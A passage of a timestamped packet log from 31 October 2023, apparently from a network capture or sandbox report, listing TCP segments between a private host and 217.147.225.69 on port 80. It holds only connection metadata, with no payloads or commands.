                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026793957 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026803017 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026843071 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026855946 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026895046 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026910067 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026953936 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026964903 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.026998043 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027019978 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027069092 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027072906 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027117014 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027127028 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027164936 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027182102 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027224064 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027267933 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027282953 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027323961 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027331114 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027414083 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027462006 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027497053 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027514935 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027621984 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027621984 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027653933 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027672052 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027750969 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027769089 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027776957 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027825117 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027862072 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027880907 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027882099 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027882099 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027967930 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027986050 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.027986050 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028101921 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028161049 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028211117 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028311014 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028321981 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028357983 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028362036 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028454065 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028454065 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028534889 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028558969 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028578043 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028661013 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028661013 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028758049 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028767109 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028789043 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028806925 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028860092 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028960943 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.028964043 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029007912 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029016018 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029033899 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029051065 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029068947 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029103994 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029151917 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029151917 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029200077 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029238939 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.029376030 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.325880051 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.325987101 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.326142073 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.326211929 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.327706099 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.327810049 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.327888012 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.327920914 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.327960014 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328069925 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328069925 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328085899 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328131914 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328165054 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328236103 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328275919 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328309059 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328375101 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328383923 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328429937 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328455925 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328528881 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328596115 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328597069 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328732967 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328744888 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328746080 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328815937 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328888893 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328958035 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.328986883 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329027891 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329077959 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329097986 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329138041 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329169989 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329241991 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329279900 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329279900 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329312086 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329360962 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329382896 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329454899 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329549074 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329550028 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329622030 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329696894 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329761028 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329823017 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329866886 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329884052 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329940081 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329946995 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.329994917 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330009937 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330038071 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330074072 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330135107 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330162048 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330197096 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330251932 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330311060 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330317020 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330353975 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330435038 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330528021 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330631018 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330634117 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330698967 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330760002 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330787897 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330848932 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330877066 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.330940962 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331001997 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331015110 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331074953 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331074953 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331176996 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331202984 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331267118 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331327915 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331383944 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331464052 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331485033 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331516981 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331547976 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331610918 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331736088 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331765890 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331793070 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331829071 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331969023 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.331969023 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332259893 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332324982 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332386017 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332448006 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332463026 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332463026 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332499027 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332519054 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332536936 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332556009 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332590103 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332590103 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332628012 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332679987 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332679987 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332679987 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332864046 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332904100 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332922935 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.332942009 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333036900 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333036900 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333108902 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333121061 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333147049 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333267927 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333267927 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333579063 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333604097 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333622932 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333642006 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333662987 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333681107 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333699942 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333718061 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333724022 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333724022 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333821058 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333821058 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333821058 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333869934 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333905935 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333930016 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.333975077 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.334034920 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.334034920 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.334151983 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.334223986 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.334270954 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.334341049 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.334372997 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.334424973 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.334490061 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.334717035 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.334845066 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.334867001 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.334912062 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.334929943 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.334949017 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.334965944 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.334996939 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.335114002 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.335119963 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.335139990 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.335243940 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.335243940 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.335253000 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.335273027 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.335385084 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.335490942 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.335539103 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.335632086 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.335655928 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.335675001 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.335720062 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.335829020 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.335876942 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.336273909 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.336297989 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.336318016 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.336337090 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.336400986 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.336400986 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.336451054 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.336486101 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.336535931 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.336548090 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.336635113 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.336683035 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.336685896 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.336735964 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.336882114 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.336987972 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337024927 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337044001 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337152004 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337179899 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337235928 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337239981 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337239981 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337337017 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337480068 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337629080 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337651014 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337668896 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337687969 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337718010 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337754011 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337754011 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337802887 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337851048 CET5007680192.168.11.20217.147.225.69
